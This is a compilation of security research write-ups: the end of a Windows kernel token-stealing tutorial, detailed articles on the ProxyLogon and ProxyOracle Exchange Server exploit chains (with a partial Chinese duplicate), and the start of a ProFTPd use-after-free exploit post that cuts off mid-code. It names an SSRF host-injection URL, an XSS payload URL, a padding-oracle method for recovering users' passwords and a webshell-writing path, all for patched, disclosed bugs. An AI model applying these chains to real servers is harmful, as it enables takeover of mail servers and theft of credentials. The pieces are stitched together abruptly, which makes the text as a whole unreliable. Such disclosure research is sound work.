IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:
Finally we run whoami
again, and see that we are now SYSTEM!
We can even do the same thing with another user’s token:
Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.
The series of A New Attack Surface on MS Exchange:
Microsoft Exchange, as one of the most common email solutions in the world, has become part of the daily operation and security connection for governments and enterprises. This January, we reported a series of vulnerabilities of Exchange Server to Microsoft and named it as ProxyLogon. ProxyLogon might be the most severe and impactful vulnerability in the Exchange history ever. If you were paying attention to the industry news, you must have heard it.
While looking into ProxyLogon from the architectural level, we found it is not just a vulnerability, but an attack surface that is totally new and no one has ever mentioned before. This attack surface could lead the hackers or security researchers to more vulnerabilities. Therefore, we decided to focus on this attack surface and eventually found at least 8 vulnerabilities. These vulnerabilities cover from server side, client side, and even crypto bugs. We chained these vulnerabilities into 3 attacks:
I would like to highlight that all vulnerabilities we unveiled here are logic bugs, which means they could be reproduced and exploited more easily than any memory corruption bugs. We have presented our research at Black Hat USA and DEFCON, and won the Best Server-Side bug of Pwnie Awards 2021. You can check our presentation materials here:
By understanding the basics of this new attack surface, you won’t be surprised why we can pop out 0days easily!
I would like to state that all the vulnerabilities mentioned have been reported via the responsible vulnerability disclosure process and patched by Microsoft. You could find more detail of the CVEs and the report timeline from the following table.
Report Time | Name | CVE | Patch Time | CAS[1] | Reported By |
---|---|---|---|---|---|
Jan 05, 2021 | ProxyLogon | CVE-2021-26855 | Mar 02, 2021 | Yes | Orange Tsai, Volexity and MSTIC |
Jan 05, 2021 | ProxyLogon | CVE-2021-27065 | Mar 02, 2021 | - | Orange Tsai, Volexity and MSTIC |
Jan 17, 2021 | ProxyOracle | CVE-2021-31196 | Jul 13, 2021 | Yes | Orange Tsai |
Jan 17, 2021 | ProxyOracle | CVE-2021-31195 | May 11, 2021 | - | Orange Tsai |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34473 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34523 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-31207 | May 11, 2021 | - | Orange Tsai working with ZDI |
Jun 02, 2021 | - | - | - | Yes | Orange Tsai |
Jun 02, 2021 | - | CVE-2021-33768 | Jul 13, 2021 | - | Orange Tsai and Dlive |
Why did Exchange Server become a hot topic? From my point of view, the whole ProxyLogon attack surface is actually located at an early stage of Exchange request processing. For instance, if the entrance of Exchange is 0, and 100 is the core business logic, ProxyLogon is somewhere around 10. Again, since the vulnerability is located at the beginning place, I believe anyone who has reviewed the security of Exchange carefully would spot the attack surface. This was also why I tweeted my worry about bug collision after reporting to Microsoft. The vulnerability was so impactful, yet it’s a simple one and located at such an early stage.
You all know what happened next, Volexity found that an APT group was leveraging the same SSRF (CVE-2021-26855) to access users’ emails in early January 2021 and reported to Microsoft. Microsoft also released the urgent patches in March. From the public information released afterwards, we found that even though they used the same SSRF, the APT group was exploiting it in a very different way from us. We completed the ProxyLogon attack chain through CVE-2021-27065, while the APT group used EWS and two unknown vulnerabilities in their attack. This has convinced us that there is a bug collision on the SSRF vulnerability.
Image from Microsoft Blog
Regarding the ProxyLogon PoC we reported to MSRC appeared in the wild in late February, we were as curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation. With a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft. Maybe you would be interested in learning some interesting stories from here.
Mail server is a highly valuable asset that holds the most confidential secrets and corporate data. In other words, controlling a mail server means controlling the lifeline of a company. As the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousands Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is while a severe vulnerability appeared in Exchange Server.
Normally, I will review the existing papers and bugs before starting a research. Among the whole Exchange history, is there any interesting case? Of course. Although most vulnerabilities are based on known attack vectors, such as the deserialization or bad input validation, there are still several bugs that are worth mentioning.
The most special one is the arsenal from Equation Group in 2017. It’s the only practical and public pre-auth RCE in the Exchange history. Unfortunately, the arsenal only works on an ancient Exchange Server 2003. If the arsenal leak happened earlier, it could end up with another nuclear-level crisis.
The most interesting one is CVE-2018-8581 disclosed by someone who cooperated with ZDI. Though it was simply an SSRF, with the feature, it could be combined with NTLM Relay, the attacker could turn a boring SSRF into something really fancy. For instance, it could directly control the whole Domain Controller through a low privilege account.
The most surprising one is CVE-2020-0688, which was also disclosed by someone working with ZDI. The root cause of this bug is due to a hard-coded cryptographic key in Microsoft Exchange. With this hard-coded key, an attacker with low privilege can take over the whole Exchange Server. And as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in an essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.
Exchange is a very sophisticated application. Since 2000, Exchange has released a new version every 3 years. Whenever Exchange releases a new version, the architecture changes a lot and becomes different. The changes of architecture and iterations make it difficult to upgrade an Exchange Server. In order to ensure the compatibility between the new architecture and old ones, several design debts were incurred to Exchange Server and led to the new attack surface we found.
Where did we focus at Microsoft Exchange? We focused on the Client Access Service, CAS. CAS is a fundamental component of Exchange. Back to the version 2000/2003, CAS was an independent Frontend Server in charge of all the Frontend web rendering logics. After several renaming, integrating, and version differences, CAS has been downgraded to a service under the Mailbox Role. The official documentation from Microsoft indicates that:
Mailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server
From the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared.
CAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it’s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding Backend Service. As a Web Security researcher, I focused on the Web implementation of CAS.
The CAS web is built on Microsoft IIS. As you can see, there are two websites inside the IIS. The “Default Website” is the Frontend we mentioned before, and the “Exchange Backend” is where the business logic is. After looking into the configuration carefully, we notice that the Frontend is binding with ports 80 and 443, and the Backend is listening on ports 81 and 444. All the ports are binding with 0.0.0.0
, which means anyone could access the Frontend and Backend of Exchange directly. Wouldn’t it be dangerous? Please keep this question in mind and we will answer that later.
Exchange implements the logic of Frontend and Backend via IIS module. There are several modules in Frontend and Backend to complete different tasks, such as the filter, validation, and logging. The Frontend must contain a Proxy Module. The Proxy Module picks up the HTTP request from the client side and adds some internal settings, then forwards the request to the Backend. As for the Backend, all the applications include the Rehydration Module, which is in charge of parsing Frontend requests, populating the client information back, and continuing to process the business logic. Later we will be elaborating how Proxy Module and Rehydration Module work.
Proxy Module chooses a handler based on the current ApplicationPath
to process the HTTP request from the client side. For instance, visiting /EWS
will use EwsProxyRequestHandler
, as for /OWA
will trigger OwaProxyRequestHandler
. All the handlers in Exchange inherit the class from ProxyRequestHandler
and implement its core logic, such as how to deal with the HTTP request from the user, which URL from Backend to proxy to, and how to synchronize the information with the Backend. The class is also the most centric part of the whole Proxy Module, we will separate ProxyRequestHandler
into 3 sections:
The Request section will parse the HTTP request from the client and determine which cookie and header could be proxied to the Backend. Frontend and Backend relied on HTTP Headers to synchronize information and proxy internal status. Therefore, Exchange has defined a blacklist to avoid some internal Headers being misused.
HttpProxy\ProxyRequestHandler.cs
protected virtual bool ShouldCopyHeaderToServerRequest(string headerName) {
return !string.Equals(headerName, "X-CommonAccessToken", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-IsFromCafe", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-SourceCafeServer", OrdinalIgnoreCase)
&& !string.Equals(headerName, "msExchProxyUri", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-MSExchangeActivityCtx", OrdinalIgnoreCase)
&& !string.Equals(headerName, "return-client-request-id", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-Forwarded-For", OrdinalIgnoreCase)
&& (!headerName.StartsWith("X-Backend-Diag-", OrdinalIgnoreCase)
|| this.ClientRequest.GetHttpRequestBase().IsProbeRequest());
}
In the last stage of Request, Proxy Module will call the method AddProtocolSpecificHeadersToServerRequest
implemented by the handler to add the information to be communicated with the Backend in the HTTP header. This section will also serialize the information from the current login user and put it in a new HTTP header X-CommonAccessToken
, which will be forwarded to the Backend later.
For instance, If I log into Outlook Web Access (OWA) with the name Orange, the X-CommonAccessToken
that Frontend proxy to Backend will be:
The Proxy Section first uses the GetTargetBackendServerURL
method to calculate which Backend URL should the HTTP request be forwarded to. Then initialize a new HTTP Client request with the method CreateServerRequest
.
HttpProxy\ProxyRequestHandler.cs
protected HttpWebRequest CreateServerRequest(Uri targetUrl) {
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(targetUrl);
if (!HttpProxySettings.UseDefaultWebProxy.Value) {
httpWebRequest.Proxy = NullWebProxy.Instance;
}
httpWebRequest.ServicePoint.ConnectionLimit = HttpProxySettings.ServicePointConnectionLimit.Value;
httpWebRequest.Method = this.ClientRequest.HttpMethod;
httpWebRequest.Headers["X-FE-ClientIP"] = ClientEndpointResolver.GetClientIP(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
httpWebRequest.Headers["X-Forwarded-For"] = ClientEndpointResolver.GetClientProxyChainIPs(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
httpWebRequest.Headers["X-Forwarded-Port"] = ClientEndpointResolver.GetClientPort(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
httpWebRequest.Headers["X-MS-EdgeIP"] = Utilities.GetEdgeServerIpAsProxyHeader(SharedHttpContextWrapper.GetWrapper(this.HttpContext).Request);
// ...
return httpWebRequest;
}
Exchange will also generate a Kerberos ticket via the HTTP Service-Class of the Backend and put it in the Authorization
header. This header is designed to prevent anonymous users from accessing the Backend directly. With the Kerberos Ticket, the Backend could validate the access from the Frontend.
HttpProxy\ProxyRequestHandler.cs
if (this.ProxyKerberosAuthentication) {
serverRequest.ConnectionGroupName = this.ClientRequest.UserHostAddress + ":" + GccUtils.GetClientPort(SharedHttpContextWrapper.GetWrapper(this.HttpContext));
} else if (this.AuthBehavior.AuthState == AuthState.BackEndFullAuth || this.
ShouldBackendRequestBeAnonymous() || (HttpProxySettings.TestBackEndSupportEnabled.Value
&& !string.IsNullOrEmpty(this.ClientRequest.Headers["TestBackEndUrl"]))) {
serverRequest.ConnectionGroupName = "Unauthenticated";
} else {
serverRequest.Headers["Authorization"] = KerberosUtilities.GenerateKerberosAuthHeader(
serverRequest.Address.Host, this.TraceContext,
ref this.authenticationContext, ref this.kerberosChallenge);
}
HttpProxy\KerberosUtilities.cs
internal static string GenerateKerberosAuthHeader(string host, int traceContext, ref AuthenticationContext authenticationContext, ref string kerberosChallenge) {
byte[] array = null;
byte[] bytes = null;
// ...
authenticationContext = new AuthenticationContext();
string text = "HTTP/" + host;
authenticationContext.InitializeForOutboundNegotiate(AuthenticationMechanism.Kerberos, text, null, null);
SecurityStatus securityStatus = authenticationContext.NegotiateSecurityContext(inputBuffer, out bytes);
// ...
string @string = Encoding.ASCII.GetString(bytes);
return "Negotiate " + @string;
}
Therefore, a Client request proxied to the Backend will be added with several HTTP Headers for internal use. The two most essential Headers are X-CommonAccessToken
, which indicates the mail users’ log in identity, and Kerberos Ticket, which represents legal access from the Frontend.
The last is the section of Response. It receives the response from the Backend and decides which headers or cookies are allowed to be sent back to the Frontend.
Now let’s move on and check how the Backend processes the request from the Frontend. The Backend first uses the method IsAuthenticated
to check whether the incoming request is authenticated. Then the Backend will verify whether the request is equipped with an extended right called ms-Exch-EPI-Token-Serialization
. With the default setting, only Exchange Machine Account would have such authorization. This is also why the Kerberos Ticket generated by the Frontend could pass the checkpoint but you can’t access the Backend directly with a low authorized account.
After passing the check, Exchange will restore the login identity used in the Frontend, through deserializing the header X-CommonAccessToken
back to the original Access Token, and then put it in the httpContext
object to progress to the business logic in the Backend.
Authentication\BackendRehydrationModule.cs
private void OnAuthenticateRequest(object source, EventArgs args) {
if (httpContext.Request.IsAuthenticated) {
this.ProcessRequest(httpContext);
}
}
private void ProcessRequest(HttpContext httpContext) {
CommonAccessToken token;
if (this.TryGetCommonAccessToken(httpContext, out token)) {
// ...
}
}
private bool TryGetCommonAccessToken(HttpContext httpContext, out CommonAccessToken token) {
string text = httpContext.Request.Headers["X-CommonAccessToken"];
if (string.IsNullOrEmpty(text)) {
return false;
}
bool flag;
try {
flag = this.IsTokenSerializationAllowed(httpContext.User.Identity as WindowsIdentity);
} finally {
httpContext.Items["BEValidateCATRightsLatency"] = stopwatch.ElapsedMilliseconds - elapsedMilliseconds;
}
token = CommonAccessToken.Deserialize(text);
httpContext.Items["Item-CommonAccessToken"] = token;
//...
}
private bool IsTokenSerializationAllowed(WindowsIdentity windowsIdentity) {
flag2 = LocalServer.AllowsTokenSerializationBy(clientSecurityContext);
return flag2;
}
private static bool AllowsTokenSerializationBy(ClientSecurityContext clientContext) {
return LocalServer.HasExtendedRightOnServer(clientContext,
WellKnownGuid.TokenSerializationRightGuid); // ms-Exch-EPI-Token-Serialization
}
After a brief introduction to the architecture of CAS, we now realize that CAS is just a well-written HTTP Proxy (or Client), and we know that implementing Proxy isn’t easy. So I was wondering:
Could I use a single HTTP request to access different contexts in Frontend and Backend respectively to cause some confusion?
If we could do that, maaaaaybe I could bypass some Frontend restrictions to access arbitrary Backends and abuse some internal API. Or, we can confuse the context to leverage the inconsistency of the definition of dangerous HTTP headers between the Frontend and Backend to do further interesting attacks.
With these thoughts in mind, let’s start hunting!
The first exploit is the ProxyLogon. As introduced before, this may be the most severe vulnerability in the Exchange history ever. ProxyLogon is chained with 2 bugs:
There are more than 20 handlers corresponding to different application paths in the Frontend. While reviewing the implementations, we found the method GetTargetBackEndServerUrl
, which is responsible for calculating the Backend URL in the static resource handler, assigns the Backend target by cookies directly.
Now you figure out how simple this vulnerability is after learning the architecture!
HttpProxy\ProxyRequestHandler.cs
protected virtual Uri GetTargetBackEndServerUrl() {
this.LogElapsedTime("E_TargetBEUrl");
Uri result;
try {
UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
if (urlAnchorMailbox != null) {
result = urlAnchorMailbox.Url;
} else {
UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
clientUrlForProxy.Port = 444;
if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion) {
this.ProxyToDownLevel = true;
RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
clientUrlForProxy.Port = 443;
}
result = clientUrlForProxy.Uri;
}
}
finally {
this.LogElapsedTime("L_TargetBEUrl");
}
return result;
}
From the code snippet, you can see the property BackEndServer.Fqdn
of AnchoredRoutingTarget
is assigned from the cookie directly.
HttpProxy\OwaResourceProxyRequestHandler.cs
protected override AnchorMailbox ResolveAnchorMailbox() {
HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
if (httpCookie != null) {
this.savedBackendServer = httpCookie.Value;
}
if (!string.IsNullOrEmpty(this.savedBackendServer)) {
base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
}
return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
}
return new AnonymousAnchorMailbox(this);
}
Though we can only control the Host
part of the URL, but hang on, isn’t manipulating a URL Parser exactly what I am good at? Exchange builds the Backend URL by built-in UriBuilder
. However, since C# didn’t verify the Host
, so we can enclose the whole URL with some special characters to access arbitrary servers and ports.
https://[foo]@example.com:443/path#]:444/owa/auth/x.js
So far we have a super SSRF that can control almost all the HTTP requests and get all the replies. The most impressive thing is that the Frontend of Exchange will generate a Kerberos Ticket for us, which means even when we are attacking a protected and domain-joined HTTP service, we can still hack with the authentication of Exchange Machine Account.
So, what is the root cause of this arbitrary Backend assignment? As mentioned, the Exchange Server changes its architecture while releasing new versions. It might have different functions in different versions even with the same component under the same name. Microsoft has put great effort into ensuring the architectural capability between new and old versions. This cookie is a quick solution and the design debt of Exchange making the Frontend in the new architecture could identify where the old Backend is.
Thanks to the super SSRF allowing us to access the Backend without restriction. The next is to find a RCE bug to chain together. Here we leverage a Backend internal API /proxyLogon.ecp
to become the admin. The API is also the reason why we called it ProxyLogon.
Because we leverage the Frontend handler of static resources to access the ECExchange Control Panel (ECP) Backend, the header msExchLogonMailbox
, which is a special HTTP header in the ECP Backend, will not be blocked by the Frontend. By leveraging this minor inconsistency, we can specify ourselves as the SYSTEM user and generate a valid ECP session with the internal API.
With the inconsistency between the Frontend and Backend, we can access all the functions on ECP by Header forgery and internal Backend API abuse. Next, we have to find an RCE bug on the ECP interface to chain them together. The ECP wraps the Exchange PowerShell commands as an abstract interface by /ecp/DDI/DDIService.svc
. The DDIService
defines several PowerShell executing pipelines by XAML so that it can be accessed by Web. While verifying the DDI implementation, we found the tag of WriteFileActivity did not check the file path properly and led to an arbitrary-file-write.
DDIService\WriteFileActivity.cs
public override RunResult Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, Workflow.UpdateTableDelegate updateTableDelegate) {
DataRow dataRow = dataTable.Rows[0];
string value = (string)input[this.InputVariable];
string path = (string)input[this.OutputFileNameVariable];
RunResult runResult = new RunResult();
try {
runResult.ErrorOccur = true;
using (StreamWriter streamWriter = new StreamWriter(File.Open(path, FileMode.CreateNew)))
{
streamWriter.WriteLine(value);
}
runResult.ErrorOccur = false;
}
// ...
}
There are several paths to trigger the vulnerability of arbitrary-file-write. Here we use ResetOABVirtualDirectory.xaml
as an example and write the result of Set-OABVirtualDirectory
to the webroot to be our Webshell.
Now we have a working pre-auth RCE exploit chain. An unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an exposed 443 port. Here is an demonstration video:
As the first blog of this series, ProxyLogon perfectly shows how severe this attack surface could be. We will have more examples to come. Stay tuned!
Hi, this is the part 2 of the New MS Exchange Attack Surface. Because this article refers to several architecture introductions and attack surface concepts in the previous article, you could find the first piece here:
This time, we will be introducing ProxyOracle. Compared with ProxyLogon, ProxyOracle is an interesting exploit with a different approach. By simply leading a user to visit a malicious link, ProxyOracle allows an attacker to recover the user’s password in plaintext format completely. ProxyOracle consists of two vulnerabilities:
So where is ProxyOracle? Based on the CAS architecture we introduced before, the Frontend of CAS will first serialize the User Identity to a string and put it in the header of X-CommonAccessToken
. The header will be merged into the client’s HTTP request and sent to the Backend later. Once the Backend receives, it deserializes the header back to the original User Identity in Frontend.
We now know how the Frontend and Backend synchronize the User Identity. The next is to explain how the Frontend knows who you are and processes your credentials. The Outlook Web Access (OWA) uses a fancy interface to handle the whole login mechanism, which is called Form-Based Authentication (FBA). The FBA is a special IIS module that inherits the ProxyModule
and is responsible for executing the transformation between the credentials and cookies before entering the proxy logic.
HTTP is a stateless protocol. To keep your login state, FBA saves the username and password in cookies. Every time you visit the OWA, Exchange will parse the cookies, retrieve the credential and try to log in with that. If the login succeed, Exchange will serialize your User Identity into a string, put it into the header of X-CommonAccessToken
, and forward it to the Backend
HttpProxy\FbaModule.cs
protected override void OnBeginRequestInternal(HttpApplication httpApplication) {
httpApplication.Context.Items["AuthType"] = "FBA";
if (!this.HandleFbaAuthFormPost(httpApplication)) {
try {
this.ParseCadataCookies(httpApplication);
} catch (MissingSslCertificateException) {
NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("CafeError", ErrorFE.FEErrorCodes.SSLCertificateProblem.ToString());
throw new HttpException(302, AspNetHelper.GetCafeErrorPageRedirectUrl(httpApplication.Context, nameValueCollection));
}
}
base.OnBeginRequestInternal(httpApplication);
}
All the cookies are encrypted to ensure even if an attacker can hijack the HTTP request, he/she still couldn’t get your credential in plaintext format. FBA leverages 5 special cookies to accomplish the whole de/encryption process:
cadata
- The encrypted username and passwordcadataTTL
- The Time-To-Live timestampcadataKey
- The KEY for encryptioncadataIV
- The IV for encryptioncadataSig
- The signature to prevent tamperingThe encryption logic will first generate two 16 bytes random strings as the IV and KEY for the current session. The username and password will then be encoded with Base64, encrypted by the algorithm AES and sent back to the client within cookies. Meanwhile, the IV and KEY will be sent to the user, too. To prevent the client from decrypting the credential by the known IV and KEY directly, Exchange will once again use the algorithm RSA to encrypt the IV and KEY via its SSL certificate private key before sending out!
Here is a Pseudo Code for the encryption logic:
@key = GetServerSSLCert().GetPrivateKey()
cadataSig = RSA(@key).Encrypt("Fba Rocks!")
cadataIV = RSA(@key).Encrypt(GetRandomBytes(16))
cadataKey = RSA(@key).Encrypt(GetRandomBytes(16))
@timestamp = GetCurrentTimestamp()
cadataTTL = AES_CBC(cadataKey, cadataIV).Encrypt(@timestamp)
@blob = "Basic " + ToBase64String(UserName + ":" + Password)
cadata = AES_CBC(cadataKey, cadataIV).Encrypt(@blob)
The Exchange takes CBC as its padding mode. If you are familiar with Cryptography, you might be wondering whether the CBC mode here is vulnerable to the Padding Oracle Attack? Bingo! As a matter of fact, Padding Oracle Attack is still existing in such essential software like Exchange in 2021!
When there is something wrong with the FBA, Exchange attaches an error code and redirects the HTTP request back to the original login page. So where is the Oracle? In the cookie decryption, Exchange uses an exception to catch the Padding Error, and because of the exception, the program returned immediately so that error code number is 0
, which means None
:
Location: /OWA/logon.aspx?url=…&reason=0
In contrast with the Padding Error, if the decryption is good, Exchange will continue the authentication process and try to login with the corrupted username and password. At this moment, the result must be a failure and the error code number is 2
, which represents InvalidCredntials
:
Location: /OWA/logon.aspx?url=…&reason=2
The diagram looks like:
With the difference, we now have an Oracle to identify whether the decryption process is successful or not.
HttpProxy\FbaModule.cs
private void ParseCadataCookies(HttpApplication httpApplication)
{
HttpContext context = httpApplication.Context;
HttpRequest request = context.Request;
HttpResponse response = context.Response;
string text = request.Cookies["cadata"].Value;
string text2 = request.Cookies["cadataKey"].Value;
string text3 = request.Cookies["cadataIV"].Value;
string text4 = request.Cookies["cadataSig"].Value;
string text5 = request.Cookies["cadataTTL"].Value;
// ...
RSACryptoServiceProvider rsacryptoServiceProvider = (x509Certificate.PrivateKey as RSACryptoServiceProvider);
byte[] array = null;
byte[] array2 = null;
byte[] rgb2 = Convert.FromBase64String(text2);
byte[] rgb3 = Convert.FromBase64String(text3);
array = rsacryptoServiceProvider.Decrypt(rgb2, true);
array2 = rsacryptoServiceProvider.Decrypt(rgb3, true);
// ...
using (AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider()) {
aesCryptoServiceProvider.Key = array;
aesCryptoServiceProvider.IV = array2;
using (ICryptoTransform cryptoTransform2 = aesCryptoServiceProvider.CreateDecryptor()) {
byte[] bytes2 = null;
try {
byte[] array5 = Convert.FromBase64String(text);
bytes2 = cryptoTransform2.TransformFinalBlock(array5, 0, array5.Length);
} catch (CryptographicException ex8) {
if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
ExTraceGlobals.VerboseTracer.TraceDebug<CryptographicException>((long)this.GetHashCode(), "[FbaModule::ParseCadataCookies] Received CryptographicException {0} transforming auth", ex8);
}
httpApplication.Response.AppendToLog("&CryptoError=PossibleSSLCertrolloverMismatch");
return;
} catch (FormatException ex9) {
if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
ExTraceGlobals.VerboseTracer.TraceDebug<FormatException>((long)this.GetHashCode(), "[FbaModule::ParseCadataCookies] Received FormatException {0} decoding caData auth", ex9);
}
httpApplication.Response.AppendToLog("&DecodeError=InvalidCaDataAuthCookie");
return;
}
string @string = Encoding.Unicode.GetString(bytes2);
request.Headers["Authorization"] = @string;
}
}
}
It should be noted that since the IV is encrypted with the SSL certificate private key, we can’t recover the first block of the ciphertext through XOR. But it wouldn’t cause any problem for us because the C# internally processes the strings as UTF-16, so the first 12 bytes of the ciphertext must be B\x00a\x00s\x00i\x00c\x00 \x00
. With one more Base64 encoding applied, we will only lose the first 1.5 bytes in the username field.
(16−6×2) ÷ 2 × (3/4) = 1.5
As of now, we have a Padding Oracle that allows us to decrypt any user’s cookie. BUT, how can we get the client cookies? Here we find another vulnerability to chain them together.
We discover an XSS (CVE-2021-31195) in the CAS Frontend (Yeah, CAS again) to chain together, the root cause of this XSS is relatively easy: Exchange forgets to sanitize the data before printing it out so that we can use the \
to escape from the JSON format and inject arbitrary JavaScript code.
https://exchange/owa/auth/frowny.aspx
?app=people
&et=ServerError
&esrc=MasterPage
&te=\
&refurl=}}};alert(document.domain)//
But here comes another question: all the sensitive cookies are protected by the HttpOnly flag, which makes us unable to access the cookies by JavaScript. WHAT SHOULD WE DO?
As we could execute arbitrary JavaScript on browsers, why don’t we just insert the SSRF cookie we used in ProxyLogon? Once we add this cookie and assign the Backend target value as our malicious server, Exchange will become a proxy between the victims and us. We can then take over all the client’s HTTP static resources and get the protected HttpOnly cookies!
By chaining bugs together, we have an elegant exploit that can steal any user’s cookies by just sending him/her a malicious link. What’s noteworthy is that the XSS here is only helping us to steal the cookie, which means all the decryption processes wouldn’t require any authentication and user interaction. Even if the user closes the browser, it wouldn’t affect our Padding Oracle Attack!
Here is the demonstration video showing how we recover the victim’s password:
Microsoft Exchange Server 作為當今世界上最常見的郵件解決方案,已經幾乎是企業以及政府每日工作與維繫安全不可或缺的一部分!在今年一月,我們回報了一系列的 Exchange Server 漏洞給 Microsoft,並且將這個漏洞它命名為 ProxyLogon,相信如果您有在關注業界新聞,一定也聽過這個名字!ProxyLogon 也許是 Exchange 歷史上最嚴重、影響力也最大的一個漏洞!
隨著更深入的從架構層去研究 ProxyLogon,我們發現它不僅僅只是一個漏洞,而是一整個新的、沒有人提過的攻擊面可讓駭客或安全研究員去挖掘更多的漏洞。因此我們專注深入研究這個攻擊面,並從中發現了至少八個漏洞,這些漏洞涵蓋了伺服器端、客戶端,甚至密碼學漏洞,我們並將這些漏洞組合成了三個攻擊鏈:
所有我們找到的漏洞都是邏輯漏洞,這代表相較於記憶體毀損類型的漏洞,這些漏洞更容易被重現以及利用,我們也將成果發表至 Black Hat USA 及 DEFCON 上,也同時獲得了 2021 Pwnie Awards 年度 Best Server-Side Bug 獎項,如果你有興趣的話可以從這邊下載會議的投影片!
本次提及的漏洞皆經過負責任的漏洞接露程序回報給微軟、並獲得修復,您可以從下面這張圖查看詳細的漏洞編號及回報時間表。
Report Time | Name | CVE | Patch Time | CAS[1] | Reported By |
---|---|---|---|---|---|
Jan 05, 2021 | ProxyLogon | CVE-2021-26855 | Mar 02, 2021 | Yes | Orange Tsai, Volexity and MSTIC |
Jan 05, 2021 | ProxyLogon | CVE-2021-27065 | Mar 02, 2021 | - | Orange Tsai, Volexity and MSTIC |
Jan 17, 2021 | ProxyOracle | CVE-2021-31196 | Jul 13, 2021 | Yes | Orange Tsai |
Jan 17, 2021 | ProxyOracle | CVE-2021-31195 | May 11, 2021 | - | Orange Tsai |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34473 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34523 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-31207 | May 11, 2021 | - | Orange Tsai working with ZDI |
Jun 02, 2021 | - | - | - | Yes | Orange Tsai |
Jun 02, 2021 | - | CVE-2021-33768 | Jul 13, 2021 | - | Orange Tsai and Dlive |
更詳盡的技術細節我們已陸續公布,後續連結會持續更新於本文,敬請期待:
Dear Fellowlship, today’s homily is about building a PoC for a Use-After-Free vulnerability in ProFTPd that can be triggered once authenticated and it can lead to Post-Auth Remote Code Execution. Please, take a seat and listen to the story.
This post will analyze the vulnerability and how to exploit it bypassing all the memory exploit mitigations present by default (ASLR, PIE, NX, Full RELRO, Stack Canaries etc).
First of all I want to mention:
gid_tab->pool
which is the one I decided to use on the exploit (will be explained later in this post)To trigger the vulnerability, we need to first start a new data channel transference, then interrupt through command channel while data channel is still open.
Using the data channel, we can fill heap memory to overwrite the resp_pool
struct, which is session.curr_cmd_rec->pool
at this time.
The result of triggering the vulnerability successfully is full control over resp_pool
:
gef➤ p p
$3 = (struct pool_rec *) 0x555555708220
gef➤ p resp_pool
$4 = (pool *) 0x555555708220
gef➤ p session.curr_cmd_rec->pool
$5 = (struct pool_rec *) 0x555555708220
gef➤ p *resp_pool
$6 = {
first = 0x4141414141414141,
last = 0x4141414141414141,
cleanups = 0x4141414141414141,
sub_pools = 0x4141414141414141,
sub_next = 0x4141414141414141,
sub_prev = 0x4141414141414141,
parent = 0x4141414141414141,
free_first_avail = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
tag = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>
}
Obviously, as there are not valid pointers in the struct, we end up on a segmentation fault on this line of code:
first_avail = blok->h.first_avail
blok
, which coincides with the p->last
value, is 0x4141414141414141
at that time
The ProFTPd pool allocator is the same as the Apache.
Allocations here take place using palloc()
and pcalloc()
,
which are wrapping functions for alloc_pool()
ProFTPd Pool Allocator works with blocks, which are actual glibc heap chunks.
Each block has a block_hdr
header structure that defines it:
union block_hdr {
union align a;
/* Padding */
#if defined(_LP64) || defined(__LP64__)
